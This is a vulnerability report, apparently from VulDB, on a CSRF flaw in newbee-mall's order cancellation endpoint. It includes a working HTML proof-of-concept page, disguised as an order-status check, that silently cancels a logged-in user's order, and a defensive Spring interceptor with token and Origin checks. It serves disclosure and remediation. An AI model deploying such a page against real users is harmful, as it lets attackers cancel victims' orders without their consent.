| Title | newbee-ltd newbee-mall v1.0 CSRF |
|---|---|

**Description**:

# CSRF Vulnerability in Order Cancellation
## Summary
A **CSRF vulnerability** exists in the order cancellation endpoint `/orders/{orderNo}/cancel`. An attacker can make an authenticated user's browser cancel that user's legitimate orders without the user's consent.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/orders/**");
        // ❌ No CSRF protection configured
    }
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/mall/OrderController.java` (Lines 85-95)
```java
@PutMapping("/orders/{orderNo}/cancel")
@ResponseBody
public Result cancelOrder(@PathVariable("orderNo") String orderNo, HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    // ❌ No CSRF token validation
    // ⚠️ orderNo is predictable (timestamp-based)
    String cancelOrderResult = newBeeMallOrderService.cancelOrder(orderNo, user.getUserId());
    if (ServiceResultEnum.SUCCESS.getResult().equals(cancelOrderResult)) {
        return ResultGenerator.genSuccessResult();
    } else {
        return ResultGenerator.genFailResult(cancelOrderResult);
    }
}
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ⚠️ Order numbers are predictable and can be enumerated
3. ⚠️ No additional confirmation required
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
    <title>Order Status Update</title>
</head>
<body>
    <h2>Checking your recent orders...</h2>
    <div id="status">Please wait...</div>
    <script>
        // Target order number (can be enumerated or obtained from order history page)
        var orderNo = '202602051645001'; // Example order number
        fetch('http://localhost:28089/orders/' + orderNo + '/cancel', {
            method: 'PUT',
            credentials: 'include' // Include session cookie
        })
        .then(response => response.json())
        .then(data => {
            document.getElementById('status').innerHTML = 'Update complete!';
        })
        .catch(err => {
            document.getElementById('status').innerHTML = 'Processing...';
        });
    </script>
</body>
</html>
```
## Impact
**Malicious order cancellation** - Attackers can cancel users' legitimate orders, causing inconvenience and potential business disruption.
---
**CVSS Score**: 6.5 (Medium)
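As an added defensive example (not part of the report above and not code from the newbee-mall project), the following Spring MVC interceptor shows one way to close the gap the report describes for both the configuration level and the endpoint level: every non-safe request under `/orders/**` must carry a session-bound synchronizer token, and when the browser supplies an `Origin` or `Referer` header it must match the site's own origin. The class names, the header name `X-CSRF-Token`, the session attribute key, the `_csrf` parameter name and the `javax.servlet` imports (Spring Boot 2.x) are assumptions; the allowed origin `http://localhost:28089` is taken from the report's PoC.

```java
// Added example, not project code. Assumes Spring Boot 2.x (javax.servlet) and
// Spring MVC; names of the class, header, session key and parameter are invented.
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Arrays;
import java.util.Base64;
import java.util.HashSet;
import java.util.Set;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

/** Rejects state-changing requests that do not prove they came from the site's own pages. */
public class CsrfInterceptor implements HandlerInterceptor {

    public static final String TOKEN_SESSION_KEY = "CSRF_TOKEN";   // assumed attribute name
    public static final String TOKEN_HEADER = "X-CSRF-Token";      // assumed header name
    public static final String TOKEN_PARAM = "_csrf";              // assumed form parameter name
    private static final Set<String> SAFE_METHODS =
            new HashSet<>(Arrays.asList("GET", "HEAD", "OPTIONS", "TRACE"));
    private static final SecureRandom RANDOM = new SecureRandom();

    private final String allowedOrigin; // scheme://host[:port], e.g. http://localhost:28089

    public CsrfInterceptor(String allowedOrigin) {
        this.allowedOrigin = allowedOrigin;
    }

    /** Returns the per-session token, creating it on first use; pages render it for the client. */
    public static String tokenFor(HttpSession session) {
        String token = (String) session.getAttribute(TOKEN_SESSION_KEY);
        if (token == null) {
            byte[] raw = new byte[32];
            RANDOM.nextBytes(raw);
            token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
            session.setAttribute(TOKEN_SESSION_KEY, token);
        }
        return token;
    }

    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler)
            throws Exception {
        if (SAFE_METHODS.contains(request.getMethod())) {
            return true; // safe methods must not change state, so they need no token
        }
        // 1. Origin/Referer check: a cross-site page cannot control these headers.
        //    Origin has no path (exact match); Referer carries a path (prefix match).
        String source = request.getHeader("Origin");
        if (source == null) {
            source = request.getHeader("Referer");
        }
        if (source != null && !source.equals(allowedOrigin) && !source.startsWith(allowedOrigin + "/")) {
            response.sendError(HttpServletResponse.SC_FORBIDDEN, "cross-site request rejected");
            return false;
        }
        // 2. Synchronizer token: a cross-site page cannot read the victim's session token,
        //    so it cannot send a matching value. Compared in constant time.
        HttpSession session = request.getSession(false);
        String expected = session == null ? null : (String) session.getAttribute(TOKEN_SESSION_KEY);
        String presented = request.getHeader(TOKEN_HEADER);
        if (presented == null) {
            presented = request.getParameter(TOKEN_PARAM);
        }
        if (expected == null || presented == null
                || !MessageDigest.isEqual(expected.getBytes(StandardCharsets.UTF_8),
                                          presented.getBytes(StandardCharsets.UTF_8))) {
            response.sendError(HttpServletResponse.SC_FORBIDDEN, "missing or invalid CSRF token");
            return false;
        }
        return true;
    }
}

/** Registers the interceptor on the same path pattern the report shows for the login interceptor. */
@Configuration
class CsrfConfig implements WebMvcConfigurer {
    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(new CsrfInterceptor("http://localhost:28089"))
                .addPathPatterns("/orders/**");
    }
}
```

The site's own pages would render `CsrfInterceptor.tokenFor(session)` into a meta tag or hidden field and send it back in the `X-CSRF-Token` header (or `_csrf` parameter) with every `PUT`/`POST`/`DELETE`. The Origin check alone already rejects the cross-site `fetch` in the PoC, while the token covers clients and proxies that strip `Origin` and `Referer`; marking the session cookie `SameSite=Lax` or `Strict` is a further layer. Because each step only rejects, the interceptor works whether it is registered before or after the existing login interceptor.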

| Source | https://github.com/newbee-ltd/newbee-mall/issues/108 |
|---|---|
| User | flashzyc (UID 92850) |
| Submission | 2026-02-05 11:51 (4 months ago) |
| Moderation | 2026-02-18 07:55 (13 days later) |
| Status | Duplicate |
| VulDB entry | 346456 [newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints Cross Site Request Forgery] |
| Points | 0 |